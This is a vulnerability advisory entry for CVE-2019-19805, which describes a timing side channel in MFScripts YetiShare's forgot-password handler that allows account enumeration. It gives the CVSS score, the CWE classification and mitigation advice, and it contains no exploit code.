PT-2019-15966 · Mfscripts · Mfscripts Yetishare

Published

2019-12-30

Updated

2021-07-21

CVE-2019-19805

CVSS v3.1

5.3

Medium

Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Name of the Vulnerable Software and Affected Versions MFScripts YetiShare versions 3.5.2 through 4.5.3

Description The issue allows an attacker to enumerate accounts by guessing email addresses due to a timing difference in the response of the account forgot password.ajax.php file. This timing difference occurs based on whether an email address is configured for the provided account name.

Recommendations For versions 3.5.2 through 4.5.3, consider implementing a constant response time for the account forgot password.ajax.php file to prevent attackers from exploiting the timing difference to enumerate accounts. Additionally, restrict access to this file or implement rate limiting to minimize the risk of exploitation.

Fix

Side Channel Attack

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-203

Related Identifiers

CVE-2019-19805

Affected Products

Mfscripts Yetishare

PT-2019-15966 · Mfscripts · Mfscripts Yetishare

CVE-2019-19805

Weakness Enumeration

Related Identifiers

Affected Products

References · 3